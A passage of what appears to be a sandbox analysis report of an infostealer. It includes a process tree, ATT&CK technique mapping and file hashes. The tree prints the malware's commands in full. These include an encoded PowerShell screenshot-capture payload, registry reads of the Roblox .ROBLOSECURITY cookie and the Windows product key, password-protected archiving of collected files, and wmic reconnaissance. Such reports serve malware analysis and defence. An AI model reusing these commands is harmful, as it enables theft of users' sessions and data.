BlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2932
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xzu01a3q\xzu01a3q.cmdline"
        5⤵
        
        PID:4936
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES83D6.tmp" "c:\Users\Admin\AppData\Local\Temp\xzu01a3q\CSC196E80F65A9A4472B5BFB4F4A3F8954D.TMP"
        6⤵
        
        PID:4104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1460
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1112
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4484
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1436
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\IRbKp.zip" *"
    3⤵
    PID:2672
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48402\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48402\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\IRbKp.zip" *
      4⤵
      Executes dropped EXE
      PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:4624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2856
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:2716
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1100

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffde4a6cc40,0x7ffde4a6cc4c,0x7ffde4a6cc58
  2⤵
  PID:4876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:1484
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2032,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:2344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2304,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2284 /prefetch:8
  2⤵
  PID:2856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:1532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3276 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4056,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4580 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4784,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
  2⤵
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4800,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:8
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5112,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4172 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5284,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5472,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5496 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5520,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5224,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5640 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1760
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3400,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3508 /prefetch:8
  2⤵
  PID:4972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4696,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4060 /prefetch:1
  2⤵
  PID:3876
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5532,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3512 /prefetch:1
  2⤵
  PID:2952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5396,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5304,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5356 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3832,i,10910520168399217900,7516288544633913145,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:3736

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2348

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x33c 0x460
1⤵
PID:5112

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
fe0ad6cde5fb5fdc9a760728e258a221

SHA1
ca8b76103d08bbdf184dee5bbc8496bc6c622829

SHA256
9e3d7a3c56f5cea57afc4cb6d765a1b5bb85cb725ad4d4f564f70a74390933e4

SHA512
f3c7813a3bfd064613c48b2817db1c7d899706d3df46e3beb1cdff15e794b1f5e245982906e59d1158d65fe3fcca9f9921a0386640cb82dc69d365f9a0dc7218

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

Filesize
49KB

MD5
9c03982e4ed2efc93a65fe9fdd3b5991

SHA1
d7c31690a7b4b861f7fa36158bd5fd336ed7c459

SHA256
2b23bfa90d84307a27d61b1d4f3d9b14141ffa249d0cefe2ba3b68330cbe5f97

SHA512
d2e6cd7a605c2a377a4a5c80116273c242cdc1e5c6b36683024d12af59a7dc518dab826a39bbc665a822baf53d817d60d019803f3816abeaa9029c4b67bb3f06

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017

Filesize
617KB

MD5
5f68de3a9fe2532aa4ff04097df4f272

SHA1
fa0801ad789220ac5f93c1cb1a0356cc157792b2

SHA256
e1117461878eb28381c0777eef1bf8ec226826056e631ba72006a67c07aceae2

SHA512
df92065a0105e3718efa066bddf3121ce586b69d3dde4e64293ed483d34e162d3d567b01a934a2750853a4a161ec7d19ac41753feed44431d6d9f634b79ab6bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018

Filesize
33KB

MD5
383b0cf9c1ad6f185bcae0daadd3a542

SHA1
a4d3ec3ae12e9586c62ff18bb8311ae697f10c3e

SHA256
3aee4b10da5eb1bd91dc1ef2d158e4984659dd164a5250f3944710c610caa62b

SHA512
53ff30f96d32f6261b2063ab723c2e17feebf1a259d96263db8f923550bf813ba7d90118d81c43dd37e250487d709f8909ee61fbd6e014d4ed6c198ab9cd387c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

Filesize
32KB

MD5
e8caf9aa03a76568d4dfb4bce1c070b2

SHA1
929a63300cc8b20e5d06dc052ec862b9b5df3a1f

SHA256
d6aba74a90bcbe4a59e6d0d336f0354327449ceb67ad46dc1cd0ac0b8258173b

SHA512
8e9f6d753624a0370581340612ace94e8c1c62bc64b0b4c39035721c6d088bf77b544b9f0e380c5038d0a101e8500ca8fab589c38ba1d1137df9d3f3bf140658

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000061

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
9KB

MD5
8828df8412cfc3e9f36b4766a79447b3

SHA1
1926a3a7fd2def3c208be17fc7de6b332414cfe6

SHA256
0b0dc1a6d13f8921d30da42c344c4ffdde6c461324933ef90407d6153c140e75

SHA512
14a2e8d7beebaff47800d00e709d8512de7cac12a73bf74c33267e62fbb692a1cc2a05447eacbb895bc9e9a1f442aca4ff87cbd94f484a2582323d2b600a9f61

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
859B

MD5
a0ef18724b0d1a1c9807a8a429395fb4

SHA1
0f1265c0572caa34cea22a4417907f1e1fadbd12

SHA256
261c92d8c54baf707b5d4709279d52d712b890af5a24182d28fb7b0b7512ad3c

SHA512
b6c20f8b5614e36b0bff8053a3fb03a5cde418c579de511bc742500ed3afcde66c6e816f97f65c5be3e09b750b7ad8e376c298577dda286bbd9afcd3ae0a417b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
0832c360ec2aa4e5057bd2ee4d011013

SHA1
a01058203e50d01273ea15ba335ba04855fbc6cc

SHA256
d4a3edc4ab5f690f738e4928640618980134015d88ba37aa524f7b5caf9800a3

SHA512
142e7bf40218f2b1c55e20661b5251c59d59a6f5c28e5486e302c04655030b5fe79dac487812675a1eaa55076abe7174e05aba43296cdbddf75f8deb9ef643c6

Download Submit
